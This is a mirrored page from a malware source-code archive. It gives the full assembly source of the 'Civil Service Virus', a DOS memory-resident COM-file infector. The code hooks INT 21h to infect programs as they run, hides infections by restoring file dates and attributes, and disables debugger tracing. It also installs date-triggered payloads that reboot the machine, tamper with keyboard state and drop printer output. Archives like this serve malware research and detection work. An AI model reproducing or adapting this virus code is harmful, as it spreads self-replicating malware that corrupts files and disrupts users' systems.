mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
570 lines
9.6 KiB
NASM
570 lines
9.6 KiB
NASM
; Civil Service Virus by Marvin Giskard
|
||
; Turbo Assember version 2
|
||
|
||
Exec equ 4B00h
|
||
OpenFile equ 3D02h
|
||
ReadFile equ 3Fh
|
||
WriteFile equ 40h
|
||
CloseFile equ 3Eh
|
||
EXESign equ 5A4Dh
|
||
SeekTop equ 4200h
|
||
SeekEnd equ 4202h
|
||
GetAttr equ 4300h
|
||
SetAttr equ 4301h
|
||
GetDT equ 5700h
|
||
SetDT equ 5701h
|
||
MinSize equ 4h
|
||
MaxSize equ 0FBF0h
|
||
GetDate equ 2Bh
|
||
FileID equ 2206h
|
||
MemID equ 4246h ; 'FB'
|
||
|
||
.MODEL SMALL
|
||
.CODE
|
||
ORG 0100h
|
||
|
||
Start:
|
||
XOR AX, AX
|
||
MOV DS, AX
|
||
CMP WORD PTR DS:01ACh, MemID
|
||
JNE Instl2
|
||
CMP WORD PTR DS:01AEh, FileID
|
||
JE NoInstl2
|
||
|
||
Instl2:
|
||
CALL InstallInMem
|
||
|
||
NoInstl2:
|
||
PUSH CS
|
||
PUSH CS
|
||
POP DS
|
||
POP ES
|
||
MOV DX, OFFSET FileName
|
||
MOV AX, 4B22h
|
||
INT 21h
|
||
INT 20h
|
||
|
||
FileName: DB 'TEST.COM',0
|
||
|
||
AddCode:
|
||
JMP OverData
|
||
|
||
; Addcode's data
|
||
|
||
Buf: DB 0, 0 ; Miscellaneous Buf
|
||
JumpCode: DB 0E9h, 00h, 00h ; Code to be placed at front of file
|
||
FSize: DW 0 ; File size
|
||
Attr: DB 0 ; Attr of file being infected
|
||
FDateTime: DD 0 ; Time and date of file being infected
|
||
Generation: DW 0 ; Generation counter
|
||
Infected: DW 0 ; Number of files infected
|
||
Old24Handler: DD 0 ; Old INT 24h handler
|
||
Acts: DB 0 ; Flag to stop reentry
|
||
Path: DD 0
|
||
|
||
OverData:
|
||
MOV WORD PTR DS:0100h, 0000h
|
||
MOV BYTE PTR DS:0102h, 00h
|
||
|
||
; Check if handler already installed by examining 2 words in vector
|
||
; table entry of INT 6Bh
|
||
|
||
XOR AX, AX
|
||
MOV DS, AX
|
||
CMP WORD PTR DS:01ACh, MemID
|
||
JNE Instl
|
||
CMP WORD PTR DS:01AEh, FileID
|
||
JE AlreadyInstalled
|
||
|
||
Instl:
|
||
CALL InstallInMem
|
||
JMP ALreadyInstalled
|
||
|
||
InstallInMem:
|
||
MOV WORD PTR DS:01ACh, MemID
|
||
MOV WORD PTR DS:01AEh, FileID
|
||
|
||
PUSH CS
|
||
POP DS
|
||
|
||
; Get INT 21h handler in ES:BX.
|
||
|
||
MOV AX, 3521h
|
||
INT 21h
|
||
DoOldOfs:
|
||
MOV SI, OFFSET DoOld+1
|
||
MOV [SI], BX
|
||
MOV [SI+2], ES
|
||
PUSH ES
|
||
PUSH BX
|
||
POP DX
|
||
POP DS
|
||
MOV AX, 256Dh
|
||
INT 21h
|
||
|
||
; This label is here so that the infect part will be able to calculate
|
||
; source offset of Int21Handler and then place it in here before writing
|
||
; it to disk. The OFFSET AddCode will be replaced by the right number.
|
||
|
||
Source:
|
||
MOV SI, OFFSET AddCode
|
||
|
||
; Destination e.g. Where program will be placed are now calculated by
|
||
; taking the amount of memory in $0040:$0013. Multiply by 16 to get
|
||
; segment of memory end and then subract amount of blocks needed.
|
||
; This is where routine will be placed.
|
||
|
||
MOV AX, 0040h
|
||
MOV DS, AX
|
||
MOV AX, WORD PTR DS:0013h
|
||
MOV CL, 6
|
||
SHL AX, CL
|
||
|
||
; Set dest. segment 2048 pages (32 K) below top of memory.
|
||
|
||
SUB AX, 2048
|
||
MOV ES, AX
|
||
XOR DI, DI
|
||
MOV CX, OFFSET AddCodeEnd - OFFSET AddCode
|
||
PUSH CS
|
||
POP DS
|
||
REP MOVSB
|
||
|
||
; Set INT 21h Handler to point to our routine
|
||
|
||
MOV AX, 2521h
|
||
PUSH ES
|
||
POP DS
|
||
MOV DX, OFFSET Int21Handler - OFFSET AddCode
|
||
INT 21h
|
||
|
||
MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0
|
||
|
||
RET
|
||
|
||
AlreadyInstalled:
|
||
|
||
Call DisTrace
|
||
|
||
; Code to jump back to 0100h
|
||
|
||
PUSH CS
|
||
PUSH CS
|
||
POP DS
|
||
POP ES
|
||
MOV AX, 0100h
|
||
JMP AX
|
||
|
||
; Disable tracing and breakpoint setting for debuggers.
|
||
|
||
DisTrace:
|
||
MOV AX, 0F000h
|
||
MOV DS, AX
|
||
MOV DX, 0FFF0h
|
||
MOV AX, 2501h
|
||
INT 21h
|
||
MOV AX, 2503h
|
||
INT 21h
|
||
RET
|
||
|
||
Int21Handler:
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH DI
|
||
PUSH SI
|
||
PUSH ES
|
||
PUSH DS
|
||
|
||
; Install devious act if seed is right
|
||
|
||
MOV AH, 2Ah
|
||
INT 6Dh
|
||
CMP CX, 1991
|
||
JB Act
|
||
CMP DL, 22
|
||
JNE Timer
|
||
DB 0EAh, 0F0h, 0FFh, 00h, 0F0h
|
||
|
||
Timer:
|
||
MOV AH, 25h
|
||
CMP DL, 29
|
||
JE Inst1
|
||
CMP DL, 1
|
||
JE Inst2
|
||
CMP DL, 10
|
||
JE Inst3
|
||
CMP DL, 16
|
||
JE Inst4
|
||
JMP Act
|
||
Inst1:
|
||
MOV AL, 13h
|
||
JMP SetVec
|
||
Inst2:
|
||
MOV AL, 16h
|
||
JMP SetVec
|
||
Inst3:
|
||
MOV AL, 0Dh
|
||
JMP SetVec
|
||
Inst4:
|
||
MOV AL, 10h
|
||
|
||
SetVec:
|
||
PUSH CS
|
||
POP DS
|
||
MOV DX, OFFSET Int24Handler - OFFSET AddCode
|
||
INT 6Dh
|
||
|
||
Act:
|
||
MOV AX, 0040h
|
||
MOV DS, AX
|
||
MOV AX, WORD PTR DS:006Eh
|
||
|
||
PUSH CS
|
||
POP DS
|
||
MOV BH, DS:[OFFSET Acts - OFFSET AddCode]
|
||
CMP BH, 3
|
||
JE NoAct
|
||
|
||
CMP AX, 22
|
||
JE NoAct
|
||
|
||
MOV BYTE PTR [SI], 3
|
||
MOV AX, 3509h
|
||
INT 21h
|
||
PUSH ES
|
||
PUSH BX
|
||
POP DX
|
||
POP DS
|
||
MOV AX, 256Ah
|
||
INT 21h
|
||
PUSH CS
|
||
POP DS
|
||
MOV DX, OFFSET Int9Handler - OFFSET AddCode
|
||
MOV AX, 2509h
|
||
INT 21h
|
||
|
||
MOV AX, 3517h
|
||
INT 21h
|
||
PUSH ES
|
||
PUSH BX
|
||
POP DX
|
||
POP DS
|
||
MOV AX, 256Ch
|
||
INT 21h
|
||
PUSH CS
|
||
POP DS
|
||
MOV DX, OFFSET Int17Handler - OFFSET AddCode
|
||
MOV AX, 2517h
|
||
INT 21h
|
||
|
||
NoAct:
|
||
|
||
POP DS
|
||
POP ES
|
||
POP SI
|
||
POP DI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
|
||
CMP AH, 4Bh
|
||
JE Infect
|
||
DoOld:
|
||
; This next bytes represent a JMP 0000h:0000h. The 0's will be replaced
|
||
; by the address of the old 21 handler.
|
||
DB 0EAh
|
||
DD 0
|
||
|
||
DoOldPop:
|
||
POP ES
|
||
POP DS
|
||
POP BP
|
||
POP DI
|
||
POP SI
|
||
POP DX
|
||
POP CX
|
||
POP BX
|
||
POP AX
|
||
JMP DoOld
|
||
|
||
CloseQuit:
|
||
|
||
MOV AX, 2524h
|
||
MOV SI, OFFSET Old24Handler-OFFSET AddCode
|
||
MOV DX, CS:[SI]
|
||
MOV DS, CS:[SI+2]
|
||
INT 21h
|
||
|
||
PUSH CS
|
||
POP DS
|
||
MOV SI, OFFSET FDateTime-OFFSET AddCode
|
||
MOV CX, DS:[SI]
|
||
MOV DX, DS:[SI+2]
|
||
MOV AX, SetDT
|
||
INT 21h
|
||
|
||
MOV AH, CloseFile
|
||
INT 21h
|
||
|
||
MOV AX, SetAttr
|
||
MOV CL, DS:[OFFSET Attr - OFFSET AddCode]
|
||
XOR CH, CH
|
||
MOV SI, OFFSET Path-OFFSET AddCode
|
||
MOV DX, DS:[SI]
|
||
MOV DS, DS:[SI+2]
|
||
|
||
INT 21h
|
||
|
||
JMP DoOldPop
|
||
|
||
Infect:
|
||
PUSH AX
|
||
PUSH BX
|
||
PUSH CX
|
||
PUSH DX
|
||
PUSH SI
|
||
PUSH DI
|
||
PUSH BP
|
||
PUSH DS
|
||
PUSH ES
|
||
|
||
; Get file's attr
|
||
|
||
MOV AX, GetAttr
|
||
INT 21h
|
||
JC CloseQuit
|
||
MOV CS:[OFFSET Attr-OFFSET AddCode], CL
|
||
|
||
MOV SI, OFFSET Path-OFFSET AddCode
|
||
MOV CS:[SI], DX
|
||
MOV CS:[SI+2], DS
|
||
|
||
; Get/Set INT 24h handler
|
||
|
||
MOV AX, 3524h
|
||
INT 21h
|
||
MOV SI, OFFSET Old24Handler-OFFSET AddCode
|
||
MOV CS:[SI], BX
|
||
MOV CS:[SI+2], ES
|
||
MOV AX, 2524h
|
||
PUSH CS
|
||
POP DS
|
||
MOV DX, OFFSET Int24Handler-OFFSET AddCode
|
||
INT 21h
|
||
|
||
; Set new attribute
|
||
|
||
MOV SI, OFFSET Path-OFFSET AddCode
|
||
MOV DX, CS:[SI]
|
||
MOV DS, CS:[SI+2]
|
||
|
||
MOV AX, SetAttr
|
||
MOV CX, 0020h
|
||
INT 21h
|
||
JC CloseQuitFoot
|
||
|
||
MOV AX, OpenFile
|
||
INT 21h
|
||
JC CloseQuitFoot
|
||
MOV BX, AX
|
||
|
||
; Get file's time and date and store
|
||
|
||
MOV AX, GetDT
|
||
INT 21h
|
||
JC CloseQuitFoot
|
||
PUSH CS
|
||
POP DS
|
||
MOV SI, OFFSET FDateTime-OFFSET AddCode
|
||
MOV DS:[SI], CX
|
||
MOV DS:[SI+2], DX
|
||
|
||
; Read first two bytes of file
|
||
|
||
MOV AH, ReadFile
|
||
MOV CX, 2
|
||
MOV DX, OFFSET OverData+4-OFFSET AddCode
|
||
INT 21h
|
||
JC CloseQuitFoot
|
||
|
||
; Check if fisrt two bytes identify the file as an EXE file
|
||
; If so, then don't infect the file
|
||
|
||
CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign
|
||
JE CloseQuitFoot
|
||
|
||
; Read next byte
|
||
|
||
MOV AH, ReadFile
|
||
MOV CX, 1
|
||
MOV DX, OFFSET OverData+10-OFFSET AddCode
|
||
INT 21h
|
||
JC CloseQuitFoot
|
||
|
||
; Get file size
|
||
|
||
MOV AX, SeekEnd
|
||
XOR CX, CX
|
||
XOR DX, DX
|
||
INT 21h
|
||
JC CloseQuitFoot
|
||
|
||
; Save filesize and calculate jump offset
|
||
|
||
CMP DX, 0
|
||
JG CloseQuitFoot
|
||
CMP AX, MinSize
|
||
JB CloseQuitFoot
|
||
CMP AX, MaxSize
|
||
JA CloseQuitFoot
|
||
MOV DS:[OFFSET FSize-OFFSET AddCode], AX
|
||
MOV CX, AX
|
||
SUB AX, 03h
|
||
MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX
|
||
|
||
; Calculate and store source
|
||
|
||
ADD CX, 0100h
|
||
MOV [OFFSET Source+1-OFFSET AddCode], CX
|
||
|
||
ADD CX, OFFSET DoOld-OFFSET AddCode
|
||
MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX
|
||
|
||
JMP OverFoot1
|
||
|
||
CloseQuitFoot:
|
||
JMP CloseQuit
|
||
|
||
OverFoot1:
|
||
; Read last 2 bytes to see if it is already infected
|
||
|
||
MOV AX, SeekTop
|
||
XOR CX, CX
|
||
MOV DX, [OFFSET FSize-OFFSET AddCode]
|
||
SUB DX, 2
|
||
INT 21h
|
||
|
||
MOV AH, ReadFile
|
||
MOV CX, 2
|
||
MOV DX, OFFSET Buf-OFFSET AddCode
|
||
INT 21h
|
||
|
||
CMP [OFFSET Buf-OFFSET AddCode], FileID
|
||
JE CloseQuitFoot
|
||
|
||
; Prepare to write new jump
|
||
|
||
MOV AX, SeekTop
|
||
XOR CX, CX
|
||
XOR DX, DX
|
||
INT 21h
|
||
|
||
; Write new jump
|
||
|
||
MOV AH, WriteFile
|
||
MOV CX, 3
|
||
MOV DX, OFFSET JumpCode-OFFSET AddCode
|
||
INT 21h
|
||
|
||
; Write addcode
|
||
; Code to restore first three bytes is at start of addcode
|
||
; Int21 handler is also included
|
||
; Generation counter is included in data
|
||
; ID is at the end of addcode
|
||
|
||
MOV AX, SeekEnd
|
||
XOR CX, CX
|
||
XOR DX, DX
|
||
INT 21h
|
||
|
||
; Increase generation counter before writing it to the new file
|
||
|
||
INC WORD PTR [OFFSET Generation - OFFSET AddCode]
|
||
|
||
; Set files infected to 0, for child hasn't infected anyone.
|
||
|
||
MOV SI, OFFSET Infected - OFFSET AddCode
|
||
PUSH WORD PTR [SI]
|
||
MOV WORD PTR [SI], 0
|
||
|
||
MOV AH, WriteFile
|
||
MOV DX, OFFSET AddCode - OFFSET AddCode ; 0000
|
||
MOV CX, OFFSET AddCodeEnd - OFFSET AddCode
|
||
INT 21h
|
||
|
||
; Decrease counter again, cause all his children should have the same
|
||
; generation count
|
||
|
||
DEC WORD PTR [OFFSET Generation - OFFSET AddCode]
|
||
|
||
; Pop number of files infected and incread
|
||
|
||
POP AX
|
||
INC AX
|
||
MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX
|
||
|
||
JMP CloseQuit
|
||
|
||
Int24Handler:
|
||
XOR AL, AL
|
||
IRET
|
||
|
||
Int9Handler:
|
||
PUSH AX
|
||
PUSH CX
|
||
PUSH DS
|
||
|
||
MOV AX, 0040h
|
||
MOV DS, AX
|
||
MOV AH, BYTE PTR DS:006Ch
|
||
CMP AH, 18
|
||
JA NoChange
|
||
MOV CL, 4
|
||
SHL AH, CL
|
||
SHR AH, CL
|
||
MOV BYTE PTR DS:0017h, AH
|
||
|
||
NoChange:
|
||
POP DS
|
||
POP CX
|
||
POP AX
|
||
INT 6Ah
|
||
IRET
|
||
|
||
Int17Handler:
|
||
CMP AH, 00h
|
||
JNE DoOld17
|
||
PUSH DS
|
||
PUSH AX
|
||
PUSH BX
|
||
MOV BX, 0040h
|
||
MOV DS, BX
|
||
MOV BH, BYTE PTR DS:006Ch
|
||
SHR BH, 1
|
||
SHR BH, 1
|
||
CMP BH, 22h
|
||
JE Ignore17
|
||
POP BX
|
||
POP AX
|
||
POP DS
|
||
|
||
DoOld17:
|
||
INT 6Ch
|
||
IRET
|
||
|
||
Ignore17:
|
||
POP BX
|
||
POP AX
|
||
POP DS
|
||
IRET
|
||
|
||
DW FileID
|
||
|
||
AddCodeEnd:
|
||
|
||
END Start
|
||
|